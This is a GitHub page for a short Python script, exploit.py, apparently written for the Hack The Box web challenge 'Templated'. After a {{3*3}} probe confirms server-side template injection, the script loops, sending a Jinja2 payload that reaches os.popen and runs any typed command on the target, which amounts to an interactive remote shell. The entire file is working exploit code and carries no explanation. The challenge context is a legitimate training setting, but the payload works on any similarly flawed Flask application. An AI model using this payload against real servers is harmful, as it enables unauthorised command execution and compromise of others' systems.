-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
28 lines (23 loc) · 1006 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/bin/python3
import requests
print("[!] Welcome to SSTi exploiter for HTB web challenge Templated!")
print("[!] Please enter the ip: ")
ip = input()
print("[!] Please enter the port: ")
port = input()
print("[+] Starting the check now...")
r = requests.get("http://"+ip+":"+port+"/{{3*3}}")
if '9' not in r.content.decode():
print("[-] Target not vulnerable to this SSTI exploit. Are you sure this is the correct challenge ip/port!?")
print("[!] Exiting now...")
exit()
print("[+] Looks like the check succeeded! Should spawn a command shell now!")
print("[!] Enter 'exit' as command to exit the shell!")
while True:
comm = input("[!] Enter command>> ")
if comm == 'exit':
exit()
url = "http://"+ip+":"+port+"/{{request.application.__globals__.__builtins__.__import__('os').popen('"+comm+"').read()}}"
#print(url)
req = requests.get(url)
print(req.content.decode().split("<str>")[1].split("</str>")[0])